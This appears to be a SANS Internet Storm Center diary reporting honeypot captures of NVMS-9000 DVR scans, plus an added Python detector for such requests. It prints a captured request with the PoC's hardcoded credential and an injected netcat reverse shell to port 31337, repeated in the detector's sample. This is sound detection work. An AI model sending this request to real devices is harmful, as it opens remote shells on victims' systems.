Since the beginning of October, my honeypot has been capturing numerous scans for the NVMS-9000 DVR, for which a PoC describing a "Stack Overflow in Base64 Authorization" was released last year [1].

DVR Activity NVMS-9000

The traffic captured by my honeypot matches the PoC: it uses the same Base64-encoded username and password (admin:{12213BD1-69C7-4862-843D-260500D1DA40}) and attempts to spawn a reverse shell back to a remote listener on TCP port 31337. The vendor advisory is posted here; it indicates that a firmware update is available.

Here is an example of traffic you could expect to see in your logs:

20191020-025738: data 'POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: 586\r\nAccept-Language: en-us\r\nHost: XX.71.48.119\r\nAccept: */*\r\nUser-Agent: ApiTool\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n<request version="1.0" systemType="NVMS-9000" clientType="WEB">refuseallowipiprangemactruerefusetrueip$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)'
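As an added detection example (not part of this diary), the Python below parses a raw request like the one above, decodes the Basic Authorization header and flags the three indicators the capture shows: the editBlackAndWhiteList endpoint, the PoC credential, and shell-expansion syntax inside the XML body. The sample request is constructed from the diary's capture with the masked IPs kept as-is.

```python
import base64

# Credential used by the public PoC for the NVMS-9000 issue (taken from the diary).
POC_CREDENTIAL = "admin:{12213BD1-69C7-4862-843D-260500D1DA40}"
# Shell-expansion markers seen in the injected <ip> field of this scan.
INJECTION_MARKERS = ("$(", "${IFS}", "`")


def parse_request(raw):
    """Split a CRLF-delimited HTTP request into (request line, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_basic_auth(headers):
    """Return the decoded 'user:pass' from a Basic Authorization header, or None."""
    value = headers.get("authorization", "")
    if not value.lower().startswith("basic "):
        return None
    try:
        return base64.b64decode(value[6:].strip(), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_request(raw):
    """Return the list of NVMS-9000 scan indicators found in the request (empty if none)."""
    request_line, headers, body = parse_request(raw)
    reasons = []
    if request_line.startswith("POST /editBlackAndWhiteList"):
        reasons.append("editBlackAndWhiteList endpoint")
    if decode_basic_auth(headers) == POC_CREDENTIAL:
        reasons.append("PoC credential in Basic auth")
    if any(marker in body for marker in INJECTION_MARKERS):
        reasons.append("shell expansion in XML body")
    return reasons


# Constructed sample: the diary's captured request, attacker/honeypot IPs masked as on the page.
SAMPLE = (
    "POST /editBlackAndWhiteList HTTP/1.1\r\nHost: XX.71.48.119\r\nUser-Agent: ApiTool\r\n"
    "Content-Type: text/xml\r\n"
    "Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n"
    '<request version="1.0" systemType="NVMS-9000" clientType="WEB">'
    "$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</request>"
)

if __name__ == "__main__":
    print(classify_request(SAMPLE))
```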


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.